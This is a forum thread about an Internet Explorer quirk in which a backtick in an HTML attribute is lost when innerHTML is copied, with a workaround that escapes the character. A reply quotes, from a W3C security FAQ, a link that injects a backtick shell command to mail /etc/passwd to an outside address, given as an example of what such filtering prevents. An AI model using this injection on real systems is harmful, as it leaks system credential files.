Backtick ` char causes undefined value

[lihc]

The following code is an example of an error I have encountered with the backtick ` char. When the backtick is present in html and then assigned to a javascript object that portion of the html becomes undefined.

<html>

<head>

<title>JavaScript ` Backtick Error</title>

<script language="JavaScript">

function getBackTickData() {

//this assignment is where the error occurs
bd = backtickdata.innerHTML ;

//output.innerHTML will not contain the "hasbacktick" input
output.innerHTML = bd ;

//this happens in IE but not Firefox

alert( ' backtickdata.innerHTML = ' + backtickdata.innerHTML + '\n\n' +
' bd = backtickData.innerHTML ; ' + '\n\n' +
' output.innerHTML = bd ; ' + '\n\n' +
' output.innerHTML = ' + output.innerHTML ) ;

return ;

}

</script>

</head>

<body onload="getBackTickData()" >

<div id="backtickdata" >

<input type="hidden" name="nobacktick" value="nobacktick" />

<input type="hidden" name="hasbacktick" value="`hasbacktick" />

</div>

<div id="output" >
</div>

</body>

</html>

the alert box will show both hidden inputs when it displays
backtickdata.innerHTML but then will loose the second input after the assinment and only display the first when it displays output.innerHTML. The solution I have come up with is to use
bd = backtickdata.innerHTML.replace('`','&#96;') ;
.

Does anyone know why this happens.
( it happens in IE and not Firefox ).

 

[adam0101]

Possibly a bug or possibly a security patch that prevents sql injection attacks or hacks on UNIX/LINIX like so:

<!-- Source: [URL unfurl="true"]http://www.w3.org/Security/Faq/wwwsf2.html[/URL] -->
<a href="LYNXDOWNLOAD://Method=-1/File=`mail%20hackers@hack.com%3C/etc/passwd`/SugFile=test">
CLICK HERE
</a>

Your guess is as good as mine. It works fine if the backtick is the second character instead of the first.

Adam